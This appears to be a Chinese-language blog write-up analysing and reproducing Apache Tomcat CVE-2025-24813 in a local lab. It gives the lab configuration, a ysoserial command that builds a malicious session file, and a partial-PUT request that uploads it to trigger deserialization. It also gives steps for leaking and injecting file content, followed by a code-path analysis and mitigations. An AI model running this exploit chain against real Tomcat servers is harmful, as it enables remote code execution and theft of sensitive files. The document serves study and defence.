Apache Tomcat CVE-2025-24813 漏洞分析与利用指南<\/h1>

漏洞概述<\/h2>
CVE-2025-24813 是 Apache Tomcat 中发现的一个严重漏洞，于 2025 年初被发现并在三月由 Tomcat 官方公开披露。该漏洞主要影响 Default Servlet 的部分 PUT 功能实现，可能导致远程代码执行、敏感信息泄露或恶意文件内容注入。<\/p>

漏洞影响<\/h2>

远程代码执行<\/strong>：在特定配置下可导致 RCE<\/li>
信息泄露<\/strong>：可能泄露服务器上的敏感文件<\/li>

文件内容注入<\/strong>：可能向上传的文件中注入恶意内容<\/li> <\/ul>
环境准备<\/h2>
测试环境配置<\/h3>

Tomcat 版本<\/strong>：9.0.98<\/li>
临时目录<\/strong>：C:\Users\swordlight\.SmartTomcat\tomcat9\tomcat9\work\Catalina\localhost\tomcat9<\/code><\/li>
web.xml 配置<\/strong>：设置 Default Servlet 的 readonly 为 false<\/li> <\/ol> <servlet><\/span> <\/span><\/span> <servlet-name><\/span>default<\/servlet-name><\/span> <\/span><\/span> <servlet-class><\/span>org.apache.catalina.servlets.DefaultServlet<\/servlet-class><\/span> <\/span><\/span> <init-param><\/span> <\/span><\/span> <param-name><\/span>debug<\/param-name><\/span> <\/span><\/span> <param-value><\/span>0<\/param-value><\/span> <\/span><\/span> <\/init-param><\/span> <\/span><\/span> <init-param><\/span> <\/span><\/span> <param-name><\/span>listings<\/param-name><\/span> <\/span><\/span> <param-value><\/span>false<\/param-value><\/span> <\/span><\/span> <\/init-param><\/span> <\/span><\/span> <init-param><\/span> <\/span><\/span> <param-name><\/span>readonly<\/param-name><\/span> <\/span><\/span> <param-value><\/span>false<\/param-value><\/span> <\/span><\/span> <\/init-param><\/span> <\/span><\/span> <load-on-startup><\/span>1<\/load-on-startup><\/span> <\/span><\/span><\/servlet><\/span> <\/span><\/span><\/code><\/pre> context.xml 配置<\/strong>：开启 session 持久化<\/li> <\/ol> <Manager<\/span> className=<\/span>"org.apache.catalina.session.PersistentManager"<\/span> <\/span><\/span> debug=<\/span>"0"<\/span> <\/span><\/span> saveOnRestart=<\/span>"false"<\/span> <\/span><\/span> maxActiveSession=<\/span>"-1"<\/span> <\/span><\/span> minIdleSwap=<\/span>"-1"<\/span> <\/span><\/span> maxIdleSwap=<\/span>"-1"<\/span> <\/span><\/span> maxIdleBackup=<\/span>"-1"<\/span>><\/span> <\/span><\/span> <Store<\/span> className=<\/span>"org.apache.catalina.session.FileStore"<\/span> \/><\/span> <\/span><\/span><\/Manager><\/span> <\/span><\/span><\/code><\/pre> 添加依赖<\/strong>：commons-collections 3.1（用于反序列化利用）<\/li> <\/ol> <dependency><\/span> <\/span><\/span> <groupId><\/span>commons-collections<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>commons-collections<\/artifactId><\/span> <\/span><\/span> <version><\/span>3.1<\/version><\/span> <\/span><\/span><\/dependency><\/span> <\/span><\/span><\/code><\/pre>漏洞利用 - 反序列化命令执行<\/h2> 利用步骤<\/h3> 生成恶意 session 文件<\/strong>：<\/li> <\/ol> java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "calc"<\/span> > \/tmp\/test.session <\/span><\/span><\/code><\/pre> 上传 session 文件<\/strong>：<\/li> <\/ol> PUT<\/span> \/tomcat9\/test\/session HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> localhost:8084<\/span> <\/span><\/span>Accept-Encoding:<\/span> gzip, deflate, br, zstd<\/span> <\/span><\/span>Content-Range:<\/span> bytes 0-1276\/1277<\/span> <\/span><\/span> <\/span><\/span>{{file(C:\Users\swordlight\Downloads\test.session)}} <\/span><\/span><\/code><\/pre> 触发反序列化<\/strong>：发送带有 .test<\/code> cookie 的请求<\/li> 或者等待 Tomcat 自动加载 session 文件（后台异步进程）<\/li> <\/ul> <\/li> <\/ol> 关键点分析<\/h3> 临时文件命名<\/strong>：<\/p> DefaultServlet 的 executePartialPut<\/code> 方法会基于用户提供的文件名命名临时文件（格式：.+原始文件名<\/code>）<\/li> 文件后缀名可控<\/li> <\/ul> <\/li> Session 文件加载<\/strong>：<\/p> FileStore 的 cookie 名由客户端请求的 cookie 决定，可包含特殊字符（如.<\/code>）<\/li> 开启 session 持久化时，默认将 session 文件存储在 javax.servlet.context.tempdir<\/code> 指向的目录<\/li> <\/ul> <\/li> 异步加载机制<\/strong>：<\/p> ManagerBase<\/code> 类会启动异步进程调用 processExpires()<\/code> 方法定时轮询 .session<\/code> 文件<\/li> 触发请求非必须，但可加速反序列化过程<\/li> <\/ul> <\/li> <\/ol> 漏洞利用 - 敏感信息泄露\/恶意文件内容注入<\/h2> 利用条件<\/h3> 默认 Servlet 允许写入（默认关闭）<\/li> 支持 Partial PUT（默认启用）<\/li> 安全敏感上传目录是公共上传目录的子目录<\/li> 攻击者知道敏感文件名<\/li> 敏感文件是通过 partial PUT 上传的<\/li> <\/ol> 利用步骤<\/h3> 构造敏感文件场景<\/strong>：<\/p> 在 Tomcat 根目录下创建 conf<\/code> 文件夹存放敏感文件<\/li> 上传包含密码的 sensitive.txt<\/code> 文件<\/li> <\/ul> <\/li> 复制敏感文件内容<\/strong>：<\/p> 发送 PUT 请求上传空文件 conf.sensitive.txt<\/code><\/li> 内容范围需与空文件一致<\/li> <\/ul> <\/li> 读取敏感内容<\/strong>：<\/p> GET 请求 \/conf.sensitive.txt<\/code> 即可获取敏感内容<\/li> <\/ul> <\/li> <\/ol> 恶意文件内容注入<\/h3> 通过多次对 \/conf\/sensitive.txt<\/code> 进行 Partial PUT，中间穿插一次带有恶意内容的对 \/conf.sensitive.txt<\/code> 的 Partial PUT，可实现向 \/conf\/sensitive.txt<\/code> 注入恶意内容。<\/p> 漏洞分析<\/h2> 反序列化命令执行<\/h3> 执行流程<\/strong>：<\/p> 用户上传文件 → 创建临时文件（.+原始文件名<\/code>）<\/li> 临时文件与 session 文件存储在同一目录<\/li> 通过 cookie 触发或自动加载 session 文件<\/li> <\/ul> <\/li> 调用栈<\/strong>：<\/p> processExpires() load() readSession() readSessionData() deserialize() <\/code><\/pre> <\/li> <\/ol> 敏感信息泄露\/文件注入<\/h3> 核心机制<\/strong>：<\/p> 对 \/test\/file<\/code> 和 \/test.file<\/code> 的 Partial PUT 请求会生成相同的临时文件名<\/li> 临时文件不会被自动删除（除非 Tomcat 重启）<\/li> <\/ul> <\/li> 利用原理<\/strong>：<\/p> 上传敏感文件后，尝试 Partial PUT 空文件<\/li> 最终上传的文件会包含敏感文件内容<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> CVE-2025-24813 是一个多面性的漏洞，主要利用点包括：<\/p> 远程代码执行<\/strong>：<\/p> 需要 Default Servlet 写入权限和 session 持久化<\/li> 利用文件命名和加载机制实现反序列化<\/li> <\/ul> <\/li> 信息泄露\/文件注入<\/strong>：<\/p> 利用临时文件命名规则和未清理机制<\/li> 需要特定目录结构和文件命名知识<\/li> <\/ul> <\/li> <\/ol> 防护建议<\/strong>：<\/p> 升级到修复版本<\/li> 保持 Default Servlet 的 readonly 为 true<\/li> 谨慎配置 session 持久化<\/li> 限制上传目录权限<\/li> <\/ol>